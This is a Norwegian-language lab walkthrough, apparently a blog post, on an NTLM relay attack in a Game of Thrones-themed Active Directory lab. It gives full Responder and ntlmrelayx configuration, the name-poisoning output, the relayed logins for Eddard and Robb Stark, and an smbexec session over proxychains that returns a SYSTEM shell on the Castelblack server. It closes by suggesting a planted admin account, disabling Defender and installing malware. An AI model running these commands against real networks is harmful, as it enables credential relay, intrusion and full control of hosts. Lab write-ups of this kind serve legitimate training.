Vi sjekker innholdet i filen ntlmrelay.netexec, og ser at 10.3.2.22 og 10.3.2.23 er sårbare.
$ cat ntlmrelay.netexec
10.3.2.22
10.3.2.23Vi ønsker å bruke Responder sammen med NTLMRelayX for å utføre dette angrepet, så vi setter opp NTLMRelayX slik at det lagrer sesjoner i en SOCKS proxy for oss.
$ ntlmrelayx.py -socks -smb2support -tf ./ntlmrelay.netexec
[*] Protocol Client IMAP loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client DCSYNC loaded..
[*] Protocol Client RPC loaded..
[*] Running in relay mode to hosts in targetfile
[*] SOCKS proxy started. Listening on 127.0.0.1:1080
[*] IMAP Socks Plugin loaded..
[*] LDAPS Socks Plugin loaded..
[*] SMTP Socks Plugin loaded..
[*] LDAP Socks Plugin loaded..
[*] HTTPS Socks Plugin loaded..
[*] MSSQL Socks Plugin loaded..
[*] HTTP Socks Plugin loaded..
[*] IMAPS Socks Plugin loaded..
[*] SMB Socks Plugin loaded..
[*] Setting up SMB Server on port 445
[*] Setting up HTTP Server on port 80
* Serving Flask app 'impacket.examples.ntlmrelayx.servers.socksserver'
* Debug mode: off
[*] Setting up WCF Server on port 9389
[*] Setting up RAW Server on port 6666
[*] Multirelay enabled
[*] Servers started, waiting for connectionsNTLMRelayX er oppe, og klar til å relaye mot de sårbare vertene, og til å lagre sesjonene i en SOCKS proxy vi kan benytte oss av. For å benytte dem må vi sette opp proxychains til å bruke den.
$ sudo nano /etc/proxychains4.conf
socks4 127.0.0.1 1080 #Legges til på slutten av fila.Vi må også slå av SMB poisoning i responder, ettersom vi ønsker å videresende forespørselen.
$ sudo nano /etc/responder/Responder.conf
# Påse at følgende innstillinger er satt:
; Poisoners to start
MDNS = On
LLMNR = On
NBTNS = On
; Servers to start
SMB = OffDa kan vi forsøke å forgifte LLMNR, NetBios og mDNS forespørsler på nettverket, i håp om å lure Eddard Stark til å la oss videresende hans NTLMv2 hash til Castelblack og til Braavos serverene på nettverket.
$ sudo responder -I vxlan100
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
MDNS [ON]
DNS [ON]
DHCP [OFF]
[+] Servers:
HTTP server [OFF]
HTTPS server [ON]
WPAD proxy [OFF]
Auth proxy [OFF]
SMB server [OFF]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
MQTT server [ON]
RDP server [ON]
DCE-RPC server [ON]
WinRM server [ON]
SNMP server [ON]
[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]
[+] Poisoning Options:
Analyze Mode [OFF]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [OFF]
Force ESS downgrade [OFF]
[+] Generic Options:
Responder NIC [vxlan100]
Responder IP [10.3.2.109]
Responder IPv6 [fe80::d80d:5cff:fe13:4f43]
Challenge set [1122334455667788]
Don't Respond To Names ['ISATAP', 'ISATAP.LOCAL']
Don't Respond To MDNS TLD ['_DOSVC']
TTL for poisoned response [default]
[+] Current Session Variables:
Responder Machine Name [WIN-154FN4YSOQU]
Responder Domain Name [BC6R.LOCAL]
Responder DCE-RPC Port [48223]
[*] Version: Responder 3.1.7.0
[*] Author: Laurent Gaffie, <[email protected]>
[*] To sponsor Responder: https://paypal.me/PythonResponder
[+] Listening for events... Det går litt tid og så får vi se følgende, omtrent samtidig i responder og i ntlmrelayx:
# Responder
[*] [NBT-NS] Poisoned answer sent to 10.3.2.11 for name MEREN (service: File Server)
[*] [MDNS] Poisoned answer sent to 10.3.2.11 for name Meren.local
[*] [MDNS] Poisoned answer sent to 10.3.2.11 for name Meren.local
[*] [LLMNR] Poisoned answer sent to 10.3.2.11 for name Meren
[*] [LLMNR] Poisoned answer sent to 10.3.2.11 for name Meren
[*] [MDNS] Poisoned answer sent to 10.3.2.11 for name Meren.local
[*] [MDNS] Poisoned answer sent to 10.3.2.11 for name Meren.local
[*] [LLMNR] Poisoned answer sent to 10.3.2.11 for name Meren
[*] [LLMNR] Poisoned answer sent to 10.3.2.11 for name Meren
[*] [LLMNR] Poisoned answer sent to 10.3.2.11 for name Bravos
[*] [MDNS] Poisoned answer sent to 10.3.2.11 for name Bravos.local
[*] [NBT-NS] Poisoned answer sent to 10.3.2.11 for name BRAVOS (service: File Server)
[*] [MDNS] Poisoned answer sent to 10.3.2.11 for name Bravos.local
[*] [LLMNR] Poisoned answer sent to 10.3.2.11 for name Bravos
[*] [MDNS] Poisoned answer sent to 10.3.2.11 for name Meren.local
[*] [MDNS] Poisoned answer sent to 10.3.2.11 for name Meren.local
[*] [LLMNR] Poisoned answer sent to 10.3.2.11 for name Meren
[*] [LLMNR] Poisoned answer sent to 10.3.2.11 for name Meren
[*] [MDNS] Poisoned answer sent to 10.3.2.11 for name Bravos.local
[*] [MDNS] Poisoned answer sent to 10.3.2.11 for name Bravos.local
[*] [LLMNR] Poisoned answer sent to 10.3.2.11 for name Bravos
[*] [LLMNR] Poisoned answer sent to 10.3.2.11 for name Bravos
[*] [MDNS] Poisoned answer sent to 10.3.2.11 for name Bravos.local
[*] [MDNS] Poisoned answer sent to 10.3.2.11 for name Bravos.local
[*] [LLMNR] Poisoned answer sent to 10.3.2.11 for name Bravos
[*] [LLMNR] Poisoned answer sent to 10.3.2.11 for name Bravos
[*] [MDNS] Poisoned answer sent to 10.3.2.11 for name Bravos.local
[*] [MDNS] Poisoned answer sent to 10.3.2.11 for name Bravos.local
[*] [LLMNR] Poisoned answer sent to 10.3.2.11 for name Bravos
[*] [LLMNR] Poisoned answer sent to 10.3.2.11 for name Bravos
[*] [MDNS] Poisoned answer sent to 10.3.2.11 for name Bravos.local
[*] [MDNS] Poisoned answer sent to 10.3.2.11 for name Bravos.local
[*] [LLMNR] Poisoned answer sent to 10.3.2.11 for name Bravos
[*] [LLMNR] Poisoned answer sent to 10.3.2.11 for name Bravos# NTLMRelayX
[]
[*] SMBD-Thread-32 (process_request_thread): Connection from NORTH/[email protected] controlled, attacking target smb://10.3.2.22
[*] Authenticating against smb://10.3.2.22 as NORTH/EDDARD.STARK SUCCEED
[*] SOCKS: Adding NORTH/[email protected](445) to active SOCKS connection. Enjoy
[]
[*] SMBD-Thread-32 (process_request_thread): Connection from NORTH/[email protected] controlled, attacking target smb://10.3.2.23
[*] Authenticating against smb://10.3.2.23 as NORTH/EDDARD.STARK SUCCEED
[*] SOCKS: Adding NORTH/[email protected](445) to active SOCKS connection. Enjoy
[*] All targets processed!
[*] SMBD-Thread-32 (process_request_thread): Connection from NORTH/[email protected] controlled, but there are no more targets left!
[*] Received connection from NORTH/eddard.stark at WINTERFELL, connection will be relayed after re-authentication
[*] Received connection from NORTH/eddard.stark at WINTERFELL, connection will be relayed after re-authentication
[*] All targets processed!
[*] SMBD-Thread-33 (process_request_thread): Connection from NORTH/[email protected] controlled, but there are no more targets left!
[*] Received connection from NORTH/robb.stark at WINTERFELL, connection will be relayed after re-authentication
[*] All targets processed!
[*] SMBD-Thread-34 (process_request_thread): Connection from NORTH/[email protected] controlled, but there are no more targets left!
[*] Received connection from NORTH/eddard.stark at WINTERFELL, connection will be relayed after re-authentication
[*] All targets processed!
[*] SMBD-Thread-35 (process_request_thread): Connection from NORTH/[email protected] controlled, but there are no more targets left!
[*] Received connection from NORTH/eddard.stark at WINTERFELL, connection will be relayed after re-authentication
[*] Received connection from NORTH/robb.stark at WINTERFELL, connection will be relayed after re-authentication
[*] All targets processed!
[*] SMBD-Thread-36 (process_request_thread): Connection from NORTH/[email protected] controlled, but there are no more targets left!
[*] Received connection from NORTH/robb.stark at WINTERFELL, connection will be relayed after re-authentication
[*] Received connection from NORTH/robb.stark at WINTERFELL, connection will be relayed after re-authentication
[*] All targets processed!
[*] SMBD-Thread-37 (process_request_thread): Connection from NORTH/[email protected] controlled, but there are no more targets left!
[*] Received connection from NORTH/robb.stark at WINTERFELL, connection will be relayed after re-authentication
[*] All targets processed!
[*] SMBD-Thread-38 (process_request_thread): Connection from NORTH/[email protected] controlled, but there are no more targets left!
[*] Received connection from NORTH/robb.stark at WINTERFELL, connection will be relayed after re-authentication
[*] All targets processed!
[*] SMBD-Thread-39 (process_request_thread): Connection from NORTH/[email protected] controlled, but there are no more targets left!
[*] Received connection from NORTH/robb.stark at WINTERFELL, connection will be relayed after re-authentication
Vi har altså snappet opp sesjoner for Eddard og Robb stark, og klart å etablere en sesjon på vegne av Eddard Stark mot begge serverene, og vi ser han er administrator på 10.3.2.22 som er Castelblack serveren.
socks
Protocol Target Username AdminStatus Port
-------- --------- ------------------ ----------- ----
SMB 10.3.2.22 NORTH/EDDARD.STARK TRUE 445
SMB 10.3.2.23 NORTH/EDDARD.STARK FALSE 445Vi kjører smbexec.py via den etablerte sesjonen over proxychains, og ser at vi har fått tilgang som NT Authority\SYSTEM på castelblack serveren.
$ proxychains4 -q smbexec.py NORTH/[email protected]
Password: # bare tomt passord her, bare trykk enter.
[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\system32>whoami
nt authority\system
C:\Windows\system32>hostname
castelblackVi har altså et shell på maskinen som SYSTEM og kan egentlig gjøre hva vi har lyst til å gjøre på den maskinen, for eksempel å legge til en administratorkonto vi selv kontrollerer, skru av defender og installere skadevare, eller mange andre ting.
I neste post skal vi ta for oss hvordan vi kan innhente oss rundt i miljøet, og tilegne oss høyere og høyere tilgang.